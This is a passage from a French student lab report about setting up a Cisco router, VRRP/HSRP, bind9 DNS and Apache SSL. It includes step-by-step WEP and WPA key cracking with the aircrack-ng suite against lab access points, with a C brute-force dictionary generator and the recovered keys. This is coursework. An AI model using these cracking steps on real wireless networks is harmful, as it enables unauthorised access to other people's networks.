SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
